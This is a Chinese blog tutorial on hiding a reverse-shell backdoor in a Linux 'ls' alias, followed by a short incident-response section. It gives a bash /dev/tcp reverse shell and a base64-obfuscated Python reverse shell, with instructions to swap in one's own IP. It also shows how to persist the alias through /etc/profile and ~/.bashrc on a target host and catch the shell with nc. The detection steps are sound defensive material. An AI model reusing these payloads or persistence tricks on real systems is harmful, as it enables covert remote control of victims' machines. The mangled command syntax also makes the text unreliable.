网站建设商业计划书,广州番禺核酸检测点,企业网站的内容模块,网络信息工程师目录
1. alias 后门介绍
2. alias 后门注入方式
2.1 方式一(以函数的方式执行)
2.2 方式二(执行python脚本)
3.应急响应
3.1 查看所有连接
3.2 通过PID查看异常连接的进程#xff0c;以及该进程正在执行的命令行命令
3.3 查看别名
3.4 其他情况
3.5 那么检查这些…目录
1. alias 后门介绍
2. alias 后门注入方式
2.1 方式一(以函数的方式执行)
2.2 方式二(执行python脚本)
3.应急响应
3.1 查看所有连接
3.2 通过PID查看异常连接的进程以及该进程正在执行的命令行命令
3.3 查看别名
3.4 其他情况
3.5 那么检查这些启动程序和配置文件是否被篡改 1. alias 后门介绍 在Linux系统中alias命令通常用于为常用的命令设置快捷方式或别名以提高工作效率。然而这个特性也可能被滥用来创建后门允许攻击者在不知情的情况下执行恶意命令。
2. alias 后门注入方式
2.1 方式一(以函数的方式执行)
alias命令的功能为命令设置别名
alias 查看命令的别名
定义alias lsls -al
删除别名的unalias ls
每次输入ls命令的时候都能实现ls -al# 方式一设置 输入ls时会卡主
alias lsls -al
alias lsalerts(){ ls $* --colorauto;bash -i /dev/tcp/192.168.10.12/3333 01; };alerts# 反弹shell,只需要被植入的后门的主机输入ls命令就会反弹一次shell,但是会卡主容易被发现 设置完毕后,每输入一次ls命令就会反弹一次shell ,但是会卡主,容易引起怀疑 在kali监听主机端,输入nc -lvvp 3333 监听端口 2.2 方式二(执行python脚本)
alias命令的功能为命令设置别名
alias 查看命令的别名
定义alias lsls -al
删除别名的unalias ls
每次输入ls命令的时候都能实现ls -al# 设置一后再设置二时先删除1
unalias ls
alias lsls -al# 方式二设置 需要有Python3环境
alias lsalerts(){ ls $* --colorauto;python3 -c import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,\UTF-8\)}[sys.version_info[0]](\aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xNSIsIDMzMzMpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgpCg\)));};alerts# 反弹shell
nc -lvvp 3333 # 通过在 ~/.bash_profile /etc/profile 这两个系统的配置文件中进行设置,使得服务器每次登录后就触发alias后门
vim /etc/upload
vim /.bashrc
if [ -f /etc/upload ]; then
. /etc/upload
fi
在目标主机上配置后门时需要确保目标主机有Python3的运行环境,不然无法进行反弹shell
Ubantu和Centos7一键shell更换镜像源与Linux系统Python3环境安装-CSDN博客https://blog.csdn.net/weixin_72543266/article/details/142066916?spm1001.2014.3001.5502 在进行反弹shell,时需要对执行的脚本代码中的base64中的内容进行修改.先解吗中间的base64部分,改完后,在编码回去替换
Base64 编码/解码 - 锤子在线工具此工具是一个 Base64 编码或解码在线工具实现把字符串转成 Base64 或者从 Base64 转成成字符串。https://www.toolhelper.cn/EncodeDecode/Base64
aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC44Ni4xMzciLCAzMzMzKSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDApCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAxKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMikKICAgICAgICBwID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsICItaSJdKQogICAgZXhjZXB0IEV4Y2VwdGlvbiBhcyBlOgogICAgICAgIGV4aXQoKQo # 查看别名
alias
# 如果之前有设置过,需要先删除,然后重新设置
unalias ls# 设置别名的内容,记得使用前需要修改哦(一定要将反弹shell的ip地址设置正确)
alias lsalerts(){ ls $* --colorauto;python3 -c import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,\UTF-8\)}[sys.version_info[0]](\aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMiIsIDMzMzMpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgpCg\)));};alerts# 设置完后确认一下
alias 这里用监听机kali进行监听反弹回来的端口
# 监听主机进行监听
nc -lvvp 3333 3.应急响应 此时确定后门以进行连接 3.1 查看所有连接
发现与 192.168.10.2:20546 的异常连接是反弹的shell连接
netstat -anpt 3.2 通过PID查看异常连接的进程以及该进程正在执行的命令行命令
ps aux | grep 33636 查看 PID 为33636的 PPID发现是1
cat /proc/33636/status 3.3 查看别名
通过alias发现了异常别名 这里对base64文件进行解码发现确实为反弹shell的py脚本 3.4 其他情况 通过使用命令unalias alert 可以删除别名但是如果下一次 ssh 远程登录该服务器又会重新出现该别名如上图所示猜测可能 alias 后门写进了 系统的启动程序和配置文件中比如 /etc/profile 、 /etc/bashrc 、~/.bashrc 、~/.bash_profile 、~/.profile、~/.bash_logout 才会导致每次登录服务器就会重新触发 alias 后门
3.5 那么检查这些启动程序和配置文件是否被篡改
将检查出来存在修改的文件信息,进行删除即可
stat ~/.bash_profile
stat /etc/profile
